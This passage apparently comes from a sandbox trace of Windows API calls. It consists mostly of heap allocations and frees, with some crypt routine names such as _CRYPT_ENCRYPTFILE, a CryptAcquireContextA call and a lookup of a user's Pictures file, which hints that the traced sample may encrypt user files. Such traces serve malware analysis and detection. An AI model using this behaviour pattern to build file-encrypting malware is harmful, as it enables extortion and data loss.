lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.271] FreeLibrary (hLibModule=0x772d0000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0089.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.272] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.272] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0089.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.273] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0089.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0089.275] CloseHandle (hObject=0x298) returned 1 [0089.275] FreeLibrary (hLibModule=0x772d0000) returned 1 [0089.275] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0089.275] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x160e5c10, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0x8e696ff0, ftLastAccessTime.dwHighDateTime=0x1d5e1c1, ftLastWriteTime.dwLowDateTime=0x8e696ff0, ftLastWriteTime.dwHighDateTime=0x1d5e1c1, nFileSizeHigh=0x0, nFileSizeLow=0x3e7a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kr_O D2ok83jLZ-Nq.jpg", cAlternateFileName="KR_OD2~1.JPG")) returned 0x41ac640 [0089.275] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0089.275] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0089.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0089.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0089.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0089.276] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0089.277] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0089.373] TranslateMessage (lpMsg=0x144f084) returned 0 [0089.373] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0089.374] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0089.374] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0089.374] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0089.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0089.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0089.374] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0089.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0089.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.375] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0089.375] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0089.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0089.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.376] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.376] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0089.376] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0089.376] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0089.377] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0089.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0089.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0089.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0089.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0089.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0089.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0089.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0089.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0089.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.380] RtlAllocateHeap (HeapHandle=0x1780000, 